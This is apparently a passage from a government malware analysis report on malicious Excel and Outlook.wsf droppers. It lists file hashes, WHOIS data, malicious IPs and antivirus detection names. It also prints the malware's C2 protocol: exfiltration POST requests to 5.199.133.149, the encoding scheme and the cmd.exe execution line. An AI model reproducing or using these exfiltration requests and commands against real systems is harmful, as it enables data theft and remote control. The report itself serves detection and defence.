Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.laisvas.lt
Name Server: ns3.laisvas.lt
Name Server: ns5.laisvas.lt
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-02-01T10:54:20Z <<
ZaibCb15Ak.xls
254976
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Nov 1 07:15:30 2021, Last Saved Time/Date: Mon Nov 1 07:17:43 2021, Security: 0
MD5
6cef87a6ffb254bfeb61372d24e1970a
SHA1
e21d95b648944ad2287c6bc01fcc12b05530e455
SHA256
4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
SHA512
a99ca0f86da547d2979bd854b29824da77472b16aa2d2dcbc0e5c3eb4b488ae69f9d3006bc326b52b9145076247b64ba55cacfaaf30e417ea8d4f71447d682aa
SSDEEP
6144:8k3hOdsylKlgryzc4bNhZF+E+W2knArYi4uU4pVZ8lx+tSea4awSi:PiLZpVZ8lx+tna4TZ
7.232043
Contains
Contains
Characterized_By
Figure 19
Outlook.wsf
11980
HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5
e1f97c819b1d26748ed91777084c828e
SHA1
4209a007fcf4d4913afad323eb1d1ae466f911a6
SHA256
ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
SHA512
8a98999bc6ff4094b5e1d795e32345aca4e70b8e91ad1e4ba3f6ec6dabcf5591dc5c9740e6c326b23c6120b847611006d86e56dd2590ce30cf76eb076723f477
SSDEEP
192:/LsEDuNb8pWGNm91llKk8YwB4o6N8M6sBISa9FE8mJSZbHCExZ9EEFaeYuan:zsquN4K/aHYa42saSstmJSZbxZLK
4.063463
Contained_Within
Characterized_By
Figure 20
> %temp%\\stari.txt
Select * from Win32_IP4RouteTable
"%COMPUTERNAME%"
"%USERNAME%"
E442779124B3E37D2A3F77D77B66A.Open jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d,KVj42Vxufd0LRBFfZDVj3wRxJ5CX9vOX,False
E442779124B3E37D2A3F77D77B66A.send jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d
--End strings--
It collects the victim's system IP address, computer name, and username in the format below:
--Begin information--
Format: [victim's system Internet Protocol address]|!)!)!|[Computer name]/Username
Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01"
--End information--
The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb" and wait for a response.
Displayed below is the POST request used to exfiltrate the victim's system data:
--Begin request--
POST /jznkmustntblvmdvgcwbvqb HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 5[.]199[.]133[.]149
vl=6793263635E4329334937215349F743442D53463ED3....7CC2212199221C5494228E4F70322D38562E3E6212713
--End request---
The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. It uses the same built in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|!)!)!|" or "/!&^^&!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:
--Begin command--
"cmd.exe /c [decoded command scripts]| >> %temp%\\stari.txt"
--End command--
The output of the command-line scripts executed is stored into a text file "%temp%\stari.txt". It reads the output of the command executed from the text file "%temp%\stari.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:
--Begin format--
Format: "[victim's system Internet Protocol address]|!)!)!|[Computer name]/Username|!)!)!|[Output of the command executed]"
Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"
--End format--
The above victim's system information and the output command executed are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv" and wait for a response (next command).
Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:
--Begin request--
POST /oeajgyxyxclqmfqayv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 5[.]199[.]133[.]149
vl=[re-ordered hex-encoded victim's system data and the output of the command executed]
--End request---
Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:
--Begin request--
POST /oeajgyxyxclqmfqayv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 5689
Host: 5[.]199[.]133[.]149
vl=A093273633E2339332927212329A723242D6E6D346365E7226F246E76227271E265674D6469267477C024204601063744215623203A2E202222279426216621227E272052222220296E226262EE60400253446D462D44260577314D223435023231473A36633635F6363270303E6237320E36206220200A20200622222420254226220E277022607260664E0262622E60702762560422202200322222740672742E644C265242C0425E2221722E62705272603A4020542422802228422026422424022322402D2E3223225E20200660602A7268D767776040216727020C2231422D2671726F066777692050634720DA626026606623722F0262662360692262650022262600023E62700060622460632664660F666E6260425E372002262220202E22222209222522232220222F5322222D647E2772571B626F266C472922203302022033782744368C46347730376E4030023232204D2E4235323A254063323379364643463325313062267410766E6660262E627042626220236E2262620E52002206002A62603762763F422947262799202026202625252E0224225E207056776000277C7670664F564C0446736040246622020E32302230222022260322232420272622230A2225232026206475F5706605247502746090664967232464062557626260706E6267720E2630722D32406631A33633683E3042376308366526693664363D6266256523256226273B222032242200706E3260622E263022544335666263606365676DD24624652F0577272644667162656260765EE234324E3330223563093661636A33796235403262203433273034513230223E3240362E3226227E292072272300262563292323222052222420207026627604624524307220422E0222022E706022223200222032202241262202666265606052226202657152707224636A02636433707547252740040E6244227E262002262220292E6326235226266220236E26260022622E6D62046046D65240264D276E270052364260333E6232328536326634306D3734963236243134273227302223262527252223D6222624232E20227040637D266142336264326472206D5E3222225E036022656240627D564422046473267256E4646D4261645F62751726666D69756656262022232524262922201222202A2120262227C92229262E222E6260527262206A7E224322AE2400662436082220C572634061707526569446226260666E666406772060606067666601626146202763060E0206326E606022726200624022606222627402226251606A72606443522526626644665E6276622E7060626622F0666E2372565307005272674F203E66272701272F722D26226264A262622E2A60226277ED727A376E666C6664E77377302E21660307.........EC2C602658246E29E3302A60EE602E600E422E50E5206E6E7E607E209E0E0E202E703E6E052D2E6EE07E232F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C6106612927EC2622250E244D2F8F230420F2397E6CEC225648F56E59609C61706199604C4410625E607022202856253E521D013
--End request---
It is designed to send these messages below to the C2 server using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":
--Begin message format--
"200/!&^^&!/19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|!)!)!|" or "/!&^^&!/".
"19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|sory" ==> When a command or a specific task fails
--End message format--]]>
Outlook.wsf
40674
HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5
cb84c6b5816504c993c33360aeec4705
SHA1
9f212961d1de465c20e84f3c4d8ac0302e02ce37
SHA256
d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
SHA512
fec12d5871544bf1d3038baa2c209ceb4b8c8c852b60a222d2e0486b15593cecd26e130bdadcf0927e5f556cca42d3a0bb764fcc00b685a0e464531d36a7c156
SSDEEP
768:Wqy5Dr1BE9cmvcmPcvmzm/mAm6zYAr8LBFMwEVxLa3knrjrSK0rvdRz0nq8Fj:Vy5zE9V1cnHCkn3+vdRz0nqG
4.028422
Contained_Within
Characterized_By
Connected_To
Figure 21
5.199.133.149
Related_To
Related_To
Related_To
Related_To
Connected_From
80
TCP
Domain Name: SERVDISCOUNT-CUSTOMER.COM
Registry Domain ID: 1882350046_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.psi-usa.info
Registrar URL: http://www.psi-usa.info
Updated Date: 2021-10-28T07:05:37Z
Creation Date: 2014-10-27T07:58:37Z
Registry Expiry Date: 2022-10-27T07:58:37Z
Registrar: PSI-USA, Inc. dba Domain Robot
Registrar IANA ID: 151
Registrar Abuse Contact Email: domain-abuse@psi-usa.info
Registrar Abuse Contact Phone: +49.94159559482
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.NTDNS.DE
Name Server: NS2.NTDNS.DE
Name Server: NS3.NTDNS.DE
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-01-31T07:23:45Z <<<
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a27655d14b0aabec8db70ae08a623317
SHA1
8344f2c1096687ed83c2bbad0e6e549a71b0c0b1
SHA256
12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
NCCIC
2022-02-22T16:11:27+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
218d4151b39e4ece13d3bf5ff4d1121b
SHA1
28e799d9769bb7e936d1768d498a0d2c7a0d53fb
SHA256
2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
NCCIC
2022-02-22T16:11:27+00:00
Malicious IP
IP Watchlist
185.183.96.7
NCCIC
2022-02-22T16:11:27+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
860f5c2345e8f5c268c9746337ade8b7
SHA1
6c55d3acdc2d8d331f0d13024f736bc28ef5a7e1
SHA256
9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051
NCCIC
2022-02-22T16:11:27+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
cec48bcdedebc962ce45b63e201c0624
SHA1
81f46998c92427032378e5dead48bdfc9128b225
SHA256
dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92
NCCIC
2022-02-22T16:11:28+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a65696d6b65f7159c9ffcd4119f60195
SHA1
570f7272412ff8257ed6868d90727a459e3b179e
SHA256
b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504
NCCIC
2022-02-22T16:11:28+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
4a022ea1fd2bf5e8c0d8b2343a230070
SHA1
89df0feca9a447465d41ac87cb45a6f3c02c574d
SHA256
e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13
NCCIC
2022-02-22T16:11:28+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
6c084c8f5a61c6bec5eb5573a2d51ffb
SHA1
61608ed1de56d0e4fe6af07ecba0bd0a69d825b8
SHA256
7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4
NCCIC
2022-02-22T16:11:28+00:00
Malicious IP
IP Watchlist
185.117.75.34
NCCIC
2022-02-22T16:11:28+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a0421312705e847a1c8073001fd8499c
SHA1
3204447f54adeffb339ed3e00649ae428544eca3
SHA256
9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7
NCCIC
2022-02-22T16:11:28+00:00
Malicious IP
IP Watchlist
192.210.191.188
NCCIC
2022-02-22T16:11:28+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a16f4f0c00ca43d5b20f7bc30a3f3559
SHA1
94e26fb2738e49bb70b445315c0d63a5d364c71b
SHA256
5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
NCCIC
2022-02-22T16:11:28+00:00
Malicious IP
IP Watchlist
185.183.96.44
NCCIC
2022-02-22T16:11:29+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
c0c2cd5cc018e575816c08b36969c4a6
SHA1
47a4e0d466bb20cec5d354e56a9aa3f07cec816a
SHA256
b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
NCCIC
2022-02-22T16:11:29+00:00
Malicious IP
IP Watchlist
185.118.164.21
NCCIC
2022-02-22T16:11:29+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
37fa9e6b9be7242984a39a024cade2d5
SHA1
0211569091b96cffab6918e18ccc97f4b24d88d4
SHA256
42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
NCCIC
2022-02-22T16:11:29+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
0431445d6d6e5802c207c8bc6a6402ea
SHA1
3765c1ad8a1d936aad88255aef5d6d4ce24f94e8
SHA256
3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8
NCCIC
2022-02-22T16:11:29+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
b0ab12a5a4c232c902cdeba421872c37
SHA1
a8e7659942cc19f422678181ee23297efa55fa09
SHA256
026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
NCCIC
2022-02-22T16:11:30+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
e182a861616a9f12bc79988e6a4186af
SHA1
69840d4c4755cdab01527eacbb48577d973f7157
SHA256
c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
NCCIC
2022-02-22T16:11:30+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
b3504546810e78304e879df76d4eec46
SHA1
d02d93b707ac999fde0545792870a2b82dc3a238
SHA256
f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
NCCIC
2022-02-22T16:11:30+00:00
Malicious IP
IP Watchlist
88.119.170.124
NCCIC
2022-02-22T16:11:30+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
6cef87a6ffb254bfeb61372d24e1970a
SHA1
e21d95b648944ad2287c6bc01fcc12b05530e455
SHA256
4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
NCCIC
2022-02-22T16:11:30+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
cb84c6b5816504c993c33360aeec4705
SHA1
9f212961d1de465c20e84f3c4d8ac0302e02ce37
SHA256
d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
NCCIC
2022-02-22T16:11:31+00:00
Malicious IP
IP Watchlist
5.199.133.149
NCCIC
2022-02-22T16:11:31+00:00
MAEC Characterization of a27655d14b0aabec8db70ae08a623317
Symantec
Trojan Horse
Trend Micro HouseCall
Trojan.928E7209
Trend Micro
Trojan.928E7209
ESET
a variant of Win32/Agent.ACHN trojan
trojan
MAEC Characterization of 218d4151b39e4ece13d3bf5ff4d1121b
Bitdefender
Generic.Exploit.Donut.2.5DE6F72C
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.5DE6F72C (B)
Lavasoft
Generic.Exploit.Donut.2.5DE6F72C
command-and-control
MAEC Characterization of 860f5c2345e8f5c268c9746337ade8b7
VirusBlokAda
BScope.Trojan.Agentb
ESET
a variant of Win32/Agent.ADJB trojan
MAEC Characterization of cec48bcdedebc962ce45b63e201c0624
Bitdefender
Trojan.GenericKD.37827502
McAfee
RDN/Generic.dx
K7
Trojan ( 005893651 )
IKARUS
Trojan.Win32.Agent
Symantec
Trojan.Gen.MBT
Zillya!
Trojan.Agent.Win32.2507968
AhnLab
Trojan/Win.Generic
Emsisoft
Trojan.GenericKD.37827502 (B)
Avira
TR/Agent.fizgi
VirusBlokAda
BScope.Trojan.Agentb
ESET
a variant of Win32/Agent.ADJB trojan
Lavasoft
Trojan.GenericKD.37827502
MAEC Characterization of a65696d6b65f7159c9ffcd4119f60195
Bitdefender
Generic.Exploit.Donut.2.50F4F7F0
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.50F4F7F0 (B)
Lavasoft
Generic.Exploit.Donut.2.50F4F7F0
MAEC Characterization of 4a022ea1fd2bf5e8c0d8b2343a230070
Bitdefender
Generic.Exploit.Donut.2.B85DA16C
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.B85DA16C (B)
Lavasoft
Generic.Exploit.Donut.2.B85DA16C
MAEC Characterization of 6c084c8f5a61c6bec5eb5573a2d51ffb
Bitdefender
Generic.Exploit.Shellcode.PE.1.A192654B
K7
Riskware ( 0040eff71 )
IKARUS
Trojan.PowerShell.Runner
Symantec
Trojan Horse
Sophos
Mal/Swrort-Y
Emsisoft
Generic.Exploit.Shellcode.PE.1.A192654B (B)
Avira
HEUR/AGEN.1144435
VirusBlokAda
BScope.Trojan.Wacatac
ESET
PowerShell/Runner.AA trojan
Lavasoft
Generic.Exploit.Shellcode.PE.1.A192654B
MAEC Characterization of a0421312705e847a1c8073001fd8499c
ESET
PowerShell/Agent.FP trojan
MAEC Characterization of a16f4f0c00ca43d5b20f7bc30a3f3559
ESET
PowerShell/Agent.FP trojan
MAEC Characterization of c0c2cd5cc018e575816c08b36969c4a6
NANOAV
Trojan.Script.Heuristic-js.iacgm
MAEC Characterization of 37fa9e6b9be7242984a39a024cade2d5
Emsisoft
JS.Heur.Backdoor.2.BA440290.Gen (B)
Lavasoft
JS.Heur.Backdoor.2.BA440290.Gen
backdoor
MAEC Characterization of b0ab12a5a4c232c902cdeba421872c37
Bitdefender
Trojan.Generic.30623170
McAfee
RDN/Sagent
IKARUS
Trojan.VBS.Agent
Symantec
Trojan.Mdropper
Trend Micro HouseCall
Possibl.564B8E70
Antiy
Trojan[Downloader]/MSOffice.Agent.pmk
Sophos
Troj/DocDl-AEVH
Emsisoft
Trojan.Generic.30623170 (B)
Trend Micro
Possibl.564B8E70
ESET
VBS/Agent.PMK trojan
NANOAV
Trojan.Ole2.Vbs-heuristic.druvzi
Lavasoft
Trojan.Generic.30623170
Quick Heal
X97M.Trojan.Agent.45255
downloader
dropper
loader
MAEC Characterization of e182a861616a9f12bc79988e6a4186af
Bitdefender
Trojan.Generic.31341871
McAfee
VBS/Agent.hw
IKARUS
Trojan.VBS.Agent
Symantec
VBS.Downloader.Trojan
Trend Micro HouseCall
TROJ_FR.A1B65C22
Sophos
Troj/HTA-AB
Emsisoft
Trojan.Generic.31341871 (B)
Trend Micro
TROJ_FR.A1B65C22
Avira
VBS/Dldr.Agent.HC
ESET
VBS/Agent.PMK trojan
Lavasoft
Trojan.Generic.31341871
Quick Heal
VBS.Downloader.45256
MAEC Characterization of b3504546810e78304e879df76d4eec46
McAfee
VBS/Downloader.aak
IKARUS
JS.Trojan-Downloader.Agent
Symantec
Trojan Horse
Sophos
Troj/HTA-AB
Avira
JS/Dldr.Agent.bah
NANOAV
Trojan.Script.Vbs-heuristic.druvzi
Quick Heal
VBS.Downloader.45256
MAEC Characterization of 6cef87a6ffb254bfeb61372d24e1970a
Bitdefender
Trojan.Generic.31220507
McAfee
RDN/Woreflint
IKARUS
Trojan.SuspectCRC
Symantec
Trojan.Mdropper
Trend Micro HouseCall
Trojan.E78080B2
Antiy
Trojan[Downloader]/MSOffice.Agent.gho
NETGATE
Trojan.Win32.Malware
Sophos
Troj/DocDl-AEVH
Emsisoft
Trojan.Generic.31220507 (B)
Trend Micro
Trojan.E78080B2
Avira
W97M/Hancitor.tnvir
ESET
a variant of Generik.GHODWTC trojan
NANOAV
Trojan.Ole2.Vbs-heuristic.druvzi
Lavasoft
Trojan.Generic.31220507
Quick Heal
Ole.Trojan.A3288643
MAEC Characterization of cb84c6b5816504c993c33360aeec4705
IKARUS
VBS.Trojan-Downloader.Agent
Symantec
VBS.Downloader.Trojan
Sophos
Troj/HTA-AB
Avira
VBS/Dldr.Agent.LE
NANOAV
Trojan.Script.Vbs-heuristic.druvzi
Quick Heal
VBS.Downloader.45256
10369127.r1.v1
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected